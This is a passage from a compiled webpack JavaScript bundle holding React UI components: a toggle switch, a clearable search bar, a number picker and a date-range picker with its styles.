0.25s",transition:y?null:"opacity 0.25s"},T={height:this.t,width:this.t,background:getBackgroundColor(w,this.i,this.o,a,r),cursor:s?"default":"pointer",display:"inline-block",borderRadius:"50%",position:"absolute",transform:"translateX("+w+"px)",top:Math.max(0,(f-this.t)/2),outline:0,boxShadow:$?d:u,border:0,WebkitTransition:y?null:"background-color 0.25s, transform 0.25s, box-shadow 0.15s",MozTransition:y?null:"background-color 0.25s, transform 0.25s, box-shadow 0.15s",transition:y?null:"background-color 0.25s, transform 0.25s, box-shadow 0.15s"};return React.createElement("div",{className:n,style:M},React.createElement("div",{className:"react-switch-bg",style:R,onClick:s?null:this.u},l&&React.createElement("div",{style:m},l),c&&React.createElement("div",{style:C},c)),React.createElement("div",{className:"react-switch-handle",role:"checkbox",tabIndex:s?null:0,onMouseDown:s?null:this.n,onTouchStart:s?null:this.a,onTouchMove:s?null:this.r,onTouchEnd:s?null:this.l,onTouchCancel:s?null:this.c,onKeyDown:this.f,onFocus:function(){return t.setState({b:!0})},onBlur:function(){return t.setState({b:!1})},style:T,id:p,"aria-checked":o,"aria-disabled":s,"aria-labelledby":b,"aria-label":v}))},t}(React.Component);ReactSwitch.defaultProps={disabled:!1,offColor:"#888",onColor:"#080",offHandleColor:"#fff",onHandleColor:"#fff",uncheckedIcon:uncheckedIcon,checkedIcon:checkedIcon,boxShadow:null,activeBoxShadow:"0 0 2px 3px #3bf",height:28,width:56},module.exports=ReactSwitch;


/***/ }),
/* 3528 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ClearableSearchBar; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_themes__ = __webpack_require__(77);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:components:ClearableSearchBar'); // eslint-disable-line no-unused-vars




// Style
var StyledSearchBar = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'ClearableSearchBar__StyledSearchBar',
  componentId: 'qtliog-0'
})(['display:flex;align-items:center;justify-content:center;background-color:transparent;> div{width:100%;position:relative;.closeIcon{position:absolute;top:calc(50% - 6px);right:1rem;&:hover{cursor:pointer;}}}.searchInput{input{width:100%;border:transparent;padding:0.5rem 0.5rem 0.5rem 1.25rem;background:', ';color:', ';border-radius:0;border-top-left-radius:4px;border-bottom-left-radius:4px;height:2.67rem;}}:focus,:active{}.searchButtonEnd{width:4rem;height:2.67rem;display:inline-flex;justify-content:center;align-items:center;background-color:', ';color:', ';border-bottom-right-radius:4px;border-top-right-radius:4px;padding:0 1.5rem;}.searchButtonEnd:hover{background-color:', ';cursor:pointer;}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.SEARCH_BAR_INPUT.X500;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.SECONDARY.X400;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.PRIMARY.buttonText;
}, function (_ref5) {
  var theme = _ref5.theme;
  return theme.ThemeColors.SECONDARY.X400;
});

var initialValues = {
  value: '',
  theme: __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_themes__["b" /* DefaultTheme */]
};

// Bindings

var ClearableSearchBar = function (_Component) {
  _inherits(ClearableSearchBar, _Component);

  function ClearableSearchBar() {
    var _ref6;

    var _temp, _this, _ret;

    _classCallCheck(this, ClearableSearchBar);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref6 = ClearableSearchBar.__proto__ || Object.getPrototypeOf(ClearableSearchBar)).call.apply(_ref6, [this].concat(args))), _this), _this.state = {
      value: ''
    }, _this.handleInternalFilter = function (e) {
      var value = Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["toLower"])(e.target.value);
      _this.setState(function () {
        return { value: value };
      });
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(ClearableSearchBar, [{
    key: 'render',


    //  ----Template----

    value: function render() {
      var _props = this.props,
          onChange = _props.onChange,
          onClear = _props.onClear,
          onSubmit = _props.onSubmit,
          useInnerState = _props.useInnerState,
          value = _props.value,
          theme = _props.theme;

      var searchValue = useInnerState ? this.state.value : value;
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledSearchBar,
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: 'searchInput' },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('input', {
            type: 'text',
            value: searchValue,
            onChange: useInnerState ? this.handleInternalFilter : onChange
          }),
          searchValue && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'div',
            { className: 'closeIcon', onClick: onClear },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["s" /* IconLookup */].CROSS })
          )
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: 'searchButtonEnd', onClick: onSubmit },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["s" /* IconLookup */].MAGNIFIER })
        )
      );
    }

    // ----Lifecycle Hooks----

    // ----Methods----

  }]);

  return ClearableSearchBar;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// export -- Only if this component MUST be connected at declaration. RARE.
// export default connect(mapStateToProps, dispatchProps)(ClearableSearchBar);

ClearableSearchBar.defaultProps = initialValues;


/***/ }),
/* 3529 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return NumberPicker; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes__ = __webpack_require__(77);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }






// Types


var initialValues = {
  number: 0,
  minimum: 0,
  incrementBy: 1,
  theme: __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes__["b" /* DefaultTheme */]
};

// Style
var StyledNumberPicker = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'NumberPicker__StyledNumberPicker',
  componentId: 'ygzct9-0'
})(['width:4rem;display:flex;border:1px solid ', ';justify-content:space-between;align-items:center;> span{text-align:center;width:100%;padding:0 0.25rem;cursor:initial;}.arrows{display:inline-flex;flex-direction:column;height:100%;span{height:50% padding:0 0.25rem 0 0.25rem;cursor:pointer;:hover{background-color:', ';}}}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.BLACK.hex;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.BLACK.X100;
});

var NumberPicker = function (_Component) {
  _inherits(NumberPicker, _Component);

  function NumberPicker() {
    var _ref3;

    var _temp, _this, _ret;

    _classCallCheck(this, NumberPicker);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref3 = NumberPicker.__proto__ || Object.getPrototypeOf(NumberPicker)).call.apply(_ref3, [this].concat(args))), _this), _this.state = {
      number: _this.props.number
    }, _this.increment = function () {
      var number = _this.state.number + _this.props.incrementBy;

      _this.setState(function () {
        return { number: number };
      });

      if (_this.props.onUpdate) {
        _this.props.onUpdate(number);
      }
    }, _this.decrement = function () {
      // $FlowIgnore: Fix later, stupid proptypes
      var number = _this.state.number - _this.props.incrementBy;

      _this.setState(function () {
        return { number: number };
      });

      if (_this.props.onUpdate) {
        _this.props.onUpdate(number);
      }
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(NumberPicker, [{
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledNumberPicker,
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'span',
          null,
          this.state.number
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: 'arrows' },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'span',
            { onClick: this.increment },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__["s" /* IconLookup */].CHEVRON_UP })
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'span',
            { onClick: this.decrement },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_components__["s" /* IconLookup */].CHEVRON_DOWN })
          )
        )
      );
    }

    // ----Methods----

  }]);

  return NumberPicker;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Logic & Helper Components
//
// $("#myeditablediv").keypress(function(e) {
//   if (isNaN(String.fromCharCode(e.which))) e.preventDefault();
// });

NumberPicker.defaultProps = initialValues;

/***/ }),
/* 3530 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__DatePicker__ = __webpack_require__(3531);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__DatePicker__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__DateRangePresets__ = __webpack_require__(3542);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_1__DateRangePresets__["a"]; });



/***/ }),
/* 3531 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DatePicker; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_dom__ = __webpack_require__(65);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_dom___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_dom__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_datetime__ = __webpack_require__(893);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_react_datetime___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_react_datetime__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_moment__ = __webpack_require__(141);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_moment___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_moment__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_react_portal__ = __webpack_require__(410);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_react_portal___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_react_portal__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__DatePicker_styles__ = __webpack_require__(3541);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_trustar_dom_utils__ = __webpack_require__(1479);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_themes__ = __webpack_require__(77);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_trustar_2_0_components_Button_ButtonGroup__ = __webpack_require__(401);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_trustar_2_0_utils_Date_constants__ = __webpack_require__(236);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }







var debug = __WEBPACK_IMPORTED_MODULE_4_debug___default()('app:components:DatePicker'); // eslint-disable-line no-unused-vars








// Style
var StyledDateRangeControls = __WEBPACK_IMPORTED_MODULE_3_styled_components__["c" /* default */].div.withConfig({
  displayName: 'DatePicker__StyledDateRangeControls',
  componentId: 'uprgp7-0'
})(['   display:inline-flex;align-items:center;', ''], __WEBPACK_IMPORTED_MODULE_8__DatePicker_styles__["a" /* DatePickerStyles */]);




// Minor groan, set width outside here so we can calculate absolute positioning
var flyoutWidth = 430;
var halfFlyoutWidth = flyoutWidth / 2;
var StyledDateDoubleDateFlyout = __WEBPACK_IMPORTED_MODULE_3_styled_components__["c" /* default */].div.withConfig({
  displayName: 'DatePicker__StyledDateDoubleDateFlyout',
  componentId: 'uprgp7-1'
})(['background:', ';position:absolute;z-index:3;top:', ';left:', ';box-shadow:0 1px 10px #4a4a4a;padding:10px;border:1px solid #9b9b9b;box-shadow:0 1px 4px 0 rgba(0,0,0,0.53);width:', 'px;', ''], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (props) {
  return props.position.top ? props.position.top - halfFlyoutWidth + 'px' : '0';
}, function (props) {
  return props.position.left ? 5 + (props.position.left + halfFlyoutWidth) + 'px' : '80px';
}, flyoutWidth, __WEBPACK_IMPORTED_MODULE_8__DatePicker_styles__["b" /* DoubleDatePickerStyles */]);

var StyledDatePresets = __WEBPACK_IMPORTED_MODULE_3_styled_components__["c" /* default */].div.withConfig({
  displayName: 'DatePicker__StyledDatePresets',
  componentId: 'uprgp7-2'
})(['display:flex;align-items:center;position:relative;']);

var initialValues = {
  initialFrom: new Date(),
  initialTo: new Date(),
  theme: __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_themes__["b" /* DefaultTheme */],
  pastLimit: __WEBPACK_IMPORTED_MODULE_14_trustar_2_0_utils_Date_constants__["a" /* default */].EPOCH_0,
  futureLimit: __WEBPACK_IMPORTED_MODULE_14_trustar_2_0_utils_Date_constants__["a" /* default */].NOW
};

// Bindings

var DatePicker = function (_Component) {
  _inherits(DatePicker, _Component);

  function DatePicker() {
    var _ref2;

    var _temp, _this, _ret;

    _classCallCheck(this, DatePicker);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref2 = DatePicker.__proto__ || Object.getPrototypeOf(DatePicker)).call.apply(_ref2, [this].concat(args))), _this), _this.state = { // Local state for these variables
      from: _this.props.initialFrom,
      to: _this.props.initialTo,
      isOpen: false
    }, _this.container = {
      ref: {}, // FlowBS
      position: {
        top: 0,
        left: 0
      }
    }, _this.toggleOpen = function () {
      var position = _this.container.position;

      if (_this.container.ref && !position.top || !position.left) {
        position.top = _this.container.ref.getBoundingClientRect().top;
        position.left = _this.container.ref.getBoundingClientRect().left;
      }

      _this.setState({ isOpen: !_this.state.isOpen });
    }, _this.onCancel = function () {
      return _this.setState({ isOpen: false });
    }, _this.handleFromChange = function (x) {
      return _this.setState({ from: x.toDate() });
    }, _this.handleToChange = function (x) {
      return _this.setState({ to: x.toDate() });
    }, _this.handleChange = function (e) {
      _this.props.onChange({
        from: __WEBPACK_IMPORTED_MODULE_6_moment___default()(_this.state.from).startOf('day').toDate(),
        to: __WEBPACK_IMPORTED_MODULE_6_moment___default()(_this.state.to).endOf('day').toDate(),
        e: e
      });
      _this.setState({ isOpen: false });
    }, _this.isDateWithinRange = function (current) {
      var _this$props = _this.props,
          pastLimit = _this$props.pastLimit,
          futureLimit = _this$props.futureLimit;

      return !current.isBefore(pastLimit) && !current.isAfter(futureLimit);
    }, _this.isFromDateValid = function (current) {
      var dayBeforeTo = __WEBPACK_IMPORTED_MODULE_6_moment___default()(_this.state.to).subtract(1, 'day');
      var isOverlapping = current.isAfter(dayBeforeTo);
      return _this.isDateWithinRange(current) && !isOverlapping;
    }, _this.isToDateValid = function (current) {
      var dayAfterFrom = __WEBPACK_IMPORTED_MODULE_6_moment___default()(_this.state.from).add(1, 'day');
      var isOverlapping = current.isBefore(dayAfterFrom);
      return _this.isDateWithinRange(current) && !isOverlapping;
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(DatePicker, [{
    key: 'render',


    //  ----Template----

    value: function render() {
      var _this2 = this;

      var props = this.props;


      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledDateRangeControls,
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: 'dateRangePicker', ref: function ref(el) {
              _this2.container.ref = el;
            } },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'span',
            { className: 'dateRangeToggle', style: { fontWeight: this.state.isOpen ? 'bold' : 'normal' }, onClick: this.toggleOpen },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_10_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_10_trustar_2_0_components__["s" /* IconLookup */].CALENDAR_FULL }),
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              'span',
              null,
              this.props.caption || 'Range'
            )
          ),
          this.state.isOpen && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_7_react_portal___default.a,
            {
              isOpened: this.state.isOpen,
              onClose: function onClose() {
                return _this2.setState({ isOpen: false });
              },
              closeOnEsc: true },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              StyledDateDoubleDateFlyout,
              {
                position: this.container.position
              },
              __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                'div',
                { className: 'doubleDatePicker' },
                __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                  'div',
                  { className: 'from' },
                  __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_5_react_datetime___default.a, {
                    value: this.state.from,
                    onChange: this.handleFromChange,
                    timeFormat: false /* Disable time fifeld */,
                    isValidDate: this.isFromDateValid,
                    renderInput: function renderInput(_ref3) {
                      var className = _ref3.className,
                          inputProps = _objectWithoutProperties(_ref3, ['className']);

                      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                        'header',
                        null,
                        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                          'span',
                          null,
                          'From:',
                          ' '
                        ),
                        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('input', _extends({ className: 'dateInput' }, inputProps))
                      );
                    }
                  })
                ),
                __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                  'div',
                  { className: 'to' },
                  __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_5_react_datetime___default.a, {
                    value: this.state.to,
                    onChange: this.handleToChange,
                    timeFormat: false /* Disable time fifeld */,
                    isValidDate: this.isToDateValid,
                    renderInput: function renderInput(_ref4) {
                      var className = _ref4.className,
                          inputProps = _objectWithoutProperties(_ref4, ['className']);

                      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                        'header',
                        null,
                        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                          'span',
                          null,
                          'To:',
                          ' '
                        ),
                        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('input', _extends({ className: 'dateInput' }, inputProps))
                      );
                    }
                  })
                )
              ),
              __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                __WEBPACK_IMPORTED_MODULE_13_trustar_2_0_components_Button_ButtonGroup__["a" /* default */],
                { className: 'dateRangeControls' },
                __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                  __WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components_Button__["a" /* Button */],
                  { size: 'small', fill: 'none', style: { marginRight: 10 }, onClick: this.onCancel, className: 'cancel' },
                  'Cancel'
                ),
                __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
                  __WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components_Button__["a" /* Button */],
                  { size: 'small', onClick: this.handleChange, className: 'apply' },
                  'Apply'
                )
              )
            )
          )
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(StyledDatePresets, null)
      );
    }

    // ----Lifecycle Hooks----

    // ----Methods----

    /**
     * Propagate a change event up to the parent component.
     */

  }]);

  return DatePicker;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Logic & Helper Components

DatePicker.defaultProps = initialValues;


/***/ }),
/* 3532 */,
/* 3533 */,
/* 3534 */,
/* 3535 */,
/* 3536 */,
/* 3537 */,
/* 3538 */,
/* 3539 */,
/* 3540 */,
/* 3541 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DatePickerStyles; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DoubleDatePickerStyles; });
var DatePickerStyles = "\n  .dateRangeToggle {\n    display: flex;\n    align-items: center;\n    font-size: 1rem;\n    border-color: transparent;\n    cursor: pointer;\n  }\n  \n  .dateRangePicker {\n    position: relative;  \n    z-index: 2;\n    \n    i {\n      margin-right: 1rem;\n    }  \n  }\n\n";

var DoubleDatePickerStyles = "  \n.doubleDatePicker {\n  display: flex;\n  justify-content: center;\n}\n.rdtPicker {\n  border: 1px solid #a3a3a3;\n  min-height: 230px;\n  display: block;\n  position: static;\n  width: auto;\n  padding: 0;\n  margin-top: 0;\n  box-shadow: none;\n}\n.rdtPicker table {\n  width: 100%;\n}\n.rdtPicker thead {\n  border-bottom: 1px solid #a3a3a3;\n}\n.rdtPicker thead th {\n  background: #eee;\n  padding: 6px;\n  text-align: center;\n  border-bottom: none;\n}\n.rdtPicker tbody td {\n  padding: 6px;\n  cursor: pointer;\n  text-align: center;\n  user-select: none;\n}\n.rdtPicker tbody td:hover {\n  background: #eee;\n  color: #000;\n  font-weight: bold;\n}\n.rdtPicker tbody .rdtDisabled {\n  cursor: not-allowed;\n  color: #c3c3c3;\n}\n.rdtPicker tbody .rdtDisabled:hover {\n  background: #fff;\n  color: #c3c3c3;\n}\n.dow {\n  font-size: 9px;\n  color: #8e8e8e;\n  padding: 3px;\n}\n.rdtDay {\n  font-size: 11px;\n  text-align: center;\n}\n.rdtNew,\n.rdtOld {\n  color: #c3c3c3;\n}\ntd.rdtActive {\n  background: #eee;\n  color: #000;\n  font-weight: bold;\n}\n.rdtSwitch {\n  font-size: 11px;\n}\n.from {\n  margin-right: 20px;\n}\n.dateRangeControls {\n  display: flex;\n  align-items: center;\n  justify-content: flex-end;\n  margin-top: 10px;\n}\n\n.dateInput {\n  width: 100%;\n";

/***/ }),
/* 3542 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DateRangePresets; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_utils_Date_constants__ = __webpack_require__(236);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_themes__ = __webpack_require__(77);
